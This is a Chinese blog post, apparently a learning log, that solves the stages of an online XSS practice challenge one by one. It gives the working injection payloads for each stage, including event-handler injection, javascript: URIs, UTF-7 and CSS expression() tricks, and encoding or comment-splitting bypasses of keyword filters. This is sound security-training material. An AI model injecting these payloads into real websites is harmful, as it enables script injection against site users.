xss challenges平台学习

虽然在很早之前就接触过xss,有一段时间还就着一本书研究过,但是始终没有实感,掌握的也不够系统,所以现在借着这几个平台再学习一遍

首先来玩一玩xss challenge平台

第一关:http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9

  

第二关:http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1

提示:close the current tag and add SCRIPT tag...

第三关:http://xss-quiz.int21h.jp/stage-3.php?sid=93de7707279b3a5ae4ce419bfc7c0b1f380a20f6

提示:The input in text box is properly escaped.

尝试输入查看源码发现<>被转义了,于是抓包在country的位置插入xss

成功

第四关:http://xss-quiz.int21h.jp/stage_4.php?sid=be5650b31307cf0ca1927eae2e4b755d72a4162c

提示:invisible input field

尝试在search和country处插入xss,但是查看源码发现都被转义了

同时,在抓到的包中发现存在参数p3,于是尝试在p3处插入语句,出错了,看了下源码,发现需要闭合

再来一次,成功

在源码中可以看到,改了之后的语句成功的闭合了input

第五关:http://xss-quiz.int21h.jp/stage--5.php?sid=92e1efdf82ec7681dc71fd4b5b15470cce1bbe27

提示:length limited text box

尝试在search处插入xss,发现存在输入长度的限定,于是想到可以用burp抓包,然后再修改search的值

但同样的这里也需要闭合,修改一下再发一次

成功了

还有一种方法,直接改maxlength=15

第六关:http://xss-quiz.int21h.jp/stage-no6.php?sid=10284e95452262a58b13c86015336f4489b6152e

提示:event handler attributes

输入"><script>alert(document.domain)</script><发现“<>”被过滤

那么可以用onclick在input中触发:" onclick=alert(document.domain) id="a

然后点击输入框

第七关:http://xss-quiz.int21h.jp/stage07.php?sid=2e71a47a9c7061dcce2b9205b52f4252bd53b443

提示:nearly the same... but a bit more tricky.

和上一关一样,这里的"<>都被转义了

但事实上,用" onclick=alert(document.domain)还是可以插入,因为前面的"不影响后面的onlick点击事件

还有一种方法:1 onmouseover=alert(document.domain);

onmouseover:事件会在鼠标指针移动到指定的元素上时发生。

第八关:http://xss-quiz.int21h.jp/stage008.php?sid=8407d42ea5cf46b072f5a358abffa591a449a2ba

提示:the ‘javascript‘ scheme.

scheme:属性设置或返回用于解释 content 属性的值的格式

也就是,用js的伪协议,当点击链接的时候弹出窗口

第九关:http://xss-quiz.int21h.jp/stage_09.php?sid=fcf3010be4306306e9668ee51b9d6916c0b3e129

提示:UTF-7 XSS

"<>都被转义了,当然也不能用onmouseover和onclick,根据提示,用UTF-7编码解码工具,将" onmousemove="alert(document.domain)转为UTF-7编码:

p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=UTF-7

这个对使用的IE浏览器有一定的限制,大部分浏览器都已经修复了这个漏洞,但IE7还没有

因为我的实验环境没有IE7,所以这里直接用的另一个简单粗暴的方法:

firebug是很强大的...

第十关:http://xss-quiz.int21h.jp/stage00010.php?sid=718360225fa9356a42c30995f38b5142c3496f6a

提示:s/domain//g;

很尴尬,他把domain过滤了

但是可以这样,很常见的方过滤方式:

第十一关:http://xss-quiz.int21h.jp/stage11th.php?sid=4a4c328baf358d9bf01befc79228e70d25549025

提示:s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;

对script进行了过滤

试试onclick和onmouseover,还是不行

于是想到可以用<a>标签:"><a href="javascript:alert(document.domain);">here</a><"但是,因为对script做了过滤,所以要将script中的某个字符转为unicode编码,或者可以插入 不可见字符

第十二关:http://xss-quiz.int21h.jp/stage_no012.php?sid=66a49c46b3d8e490003681f359c7b8b14ba174c8

提示:s/[\x00-\x20\&lt;\&gt;\"\‘]//g;

<>"被过滤,根据提示可以知道x00-,x20,&lt;,&gt;,",‘都被过滤了,但是`还没被过滤,于是可以用`加上onclick,onmouseover,onfocus均可,还有一个前提是IE,只有IE才有这个特性

第十三关:http://xss-quiz.int21h.jp/stage13_0.php?sid=ea59af045ae260dd938d73d6cbbd1c92a6806e06

提示:style attribute

在CSS样式中利用expression实现javascript中的onmouseover或onmouseout事件,同样前提是IE

aa:expression(onmouseover=function(){alert(document.domain)})

还有一种:

background-color:#f00;background:url("javascript:alert(document.domain);");

第十四关:http://xss-quiz.int21h.jp/stage-_-14.php?sid=88e5796eaebea97fe2b0cd79df9fbc9edad3ab9e

提示:s/(url|script|eval|expression)/xxx/ig;

这里过滤了expression,url,eval,script,但是通过加入注释符可绕过:here:expre/**/ssion(onmouseover=function(){alert(document.domain)})

或者:here:expre/**/ssion(window.x?0:(alert(document.domain),window.x=1));

还有几种绕过过滤的方法:加\,加\0,将e转码为\0056

第十五关:http://xss-quiz.int21h.jp/stage__15.php?sid=1e785fb96bdb203c00b034203ee574681d1b4403

提示:document.write();

被过滤

有几种方过滤的方法:

第一种:换成16进制编码\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

第二种:换成Unicode编码\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

第十六关:http://xss-quiz.int21h.jp/stage00000016.php?sid=d3e7f2565164c8482f758c4a887073bc36bccc45

提示:document.write();" and "s/\\x/\\\\x/ig;

第一种:换成Unicode编码\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

第二种:换成十进制\\74script\\76ealert(document.domain);\\74/script\\76

第十七关:http://xss-quiz.int21h.jp/stage-No17.php?sid=a207c91d7b4cb2634e277df104c853554347e8ca

提示:multi-byte character

思路类似于宽字节注入,利用特殊字节吃掉双引号,于是抓包修改p1,p2

p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

第十八关:http://xss-quiz.int21h.jp/stage__No18.php?sid=b23d6719a639f5655a2966a2f5ade6ec86841851

提示:us-ascii high bit issue

将每个字符的二进制最高位置为1,然后再转为16进制

故"><script>alert(document.domain)</scirpt> 就转换为%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE

但是前提还是用旧的IE版本IE5,6

第十九关: http://xss-quiz.int21h.jp/stage_--19.php?sid=8e654fc6c2fe93f2c8bd38fbc6ad6b1588d859c7

提示:Twitter DomXss at Sep 24, 2010

参考文献:

http://blog.csdn.net/nixawk/article/details/28038509

http://www.2cto.com/article/201509/441858.html

http://blog.csdn.net/emaste_r/article/details/16988167

时间: 2024-12-18 22:03:04

xss challenges平台学习的相关文章

结合代码对xss基础的学习

前言:有人曾经说过,XSS之所以那么流行,就是因为每个网站,包括Google.Microsoft等,都会存在XSS漏洞!之前对XSS这块"肥肉"只是了解,没有系统的学习一下.趁着暑假赋闲,来系统的剖析一下这块'肥肉'. 0x01 xss基础 Cross Site Script For web client 来源于js / ActiveX / Flash - js xss使用场景 直接嵌入html: <script>alert(/xss/);</script> 元

1.6 xss挑战平台练习

------------------------- XSS挑战之旅 ------------------------- 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA   密码:85g8 我这里使用本地搭建,方便分析代码,安装好的页面如下: Level 1: 分析一下源代码中的判

Azure云平台学习之路(三)——Cloud Services

1.什么是云服务? 能够部署高度可用的且可无限缩放的应用程序和API.简而言之,就是你写的CMD程序按照一定的框架进行少量修改就能运行在Azure云平台上. 2.Azure云服务有什么特点? (1)专注应用程序而不是硬件,PaaS的一种. (2)支持多种框架和语言. (3)集成了运行状况监视和负载平衡. (4)自动缩放优化成本和性能 3.建立云服务之前,我们需要建立一个云存储,来记录我们的程序的日志信息(当然,这不是必须的) (1)选择左边导航栏的"存储".主面板上显示的是所有已有的存

一个xss利用平台

这是一个project里面收到的cookies 这是设置,支持keep session和用户自定义js 自带测试代码部分 使用python + django,部署0难度. 代码在这里: https://github.com/virusdefender/xsser 一个xss利用平台,码迷,mamicode.com

AEAI Portal门户平台学习路径

1.概述 本文根据AEAI Portal的特点,为AEAI Portal门户平台初学者提供相对合理的学习路径,希望能帮助读者快速掌握AEAI Portal相关技能. 2.认识与部署 2.1 认识 Portal是一种Web应用,"portal是一种web应用,通常用来提供个性化.单点登录.聚集各个信息源的内容,并作为信息系统表现层的宿主.聚集是指将来自各个信息源的内容集成到一个web页面里的活动". AEAI Portal是国内(沈阳数通畅联软件技术有限公司)发布的一款Portal产品.

Azure云平台学习之路(一)——Azure简介

1.什么是Azure? Microsoft Azure是由微软所发展的一套云计算操作系统(云平台),提供各种优质的服务:计算.存储.数据.网络和应用程序.Azure意为天蓝色.蔚蓝色. 2.Azure特点? (1)平台即服务(Platform as a Service,PaaS)+ 基础架构即服务(Infrastructure as a Service,IaaS). 美国商务部国家标准和技术研究所(NIST)定义三种服务模式: a.SaaS(软件即服务),消费者不用操心任何问题或麻烦.如outl

Azure云平台学习之路(二)——SQL Database

1.什么是SQL Database? 托管关系数据库,数据库即服务,IaaS的一种. 2.有哪些特点? (1)为SaaS应用提供可扩展的数据存储服务. (2)易于操作大量的数据库.稍后介绍几种操作数据库的方法. (3)性能更高,稳定性更好.基于Azure平台,高性能可扩展:多地区容灾备份. (4)接近0维护,无需维护其他硬件设备. (5)支持熟悉的功能.工具和平台. (6)安全和审核功能. 3.使用的企业有: 4.创建一个数据库. (1)进入https://manage.windowsazure

大数据平台学习-1

数据平台架构图 HDFS:Hadoop分布式文件系统(HDFS)被设计成适合运行在通用硬件(commodity hardware)上的分布式文件系统.它和现有的分布式文件系统有很多共同点.但同时,它和其他的分布式文件系统的区别也是很明显的.HDFS是一个高度容错性的系统,适合部署在廉价的机器上.HDFS能提供高吞吐量的数据访问,非常适合大规模数据集上的应用.HDFS放宽了一部分POSIX约束,来实现流式读取文件系统数据的目的.HDFS在最开始是作为Apache Nutch搜索引擎项目的基础架构而

escape.alf.nu XSS Challenges 8-15 之进阶的XSS

本文链接:http://blog.csdn.net/u012763794/article/details/51526725 上次讲了challenge 0-7 http://blog.csdn.net/u012763794/article/details/51507593,我的应该比别人的会详细一点吧,其实这需要有一定的xss的实践(自己搭环境搞个没过滤的就可以了),要熟悉js 废话不多说,直接上挑战,注:要alert(1)才能通关 challenge 8 function escape(s)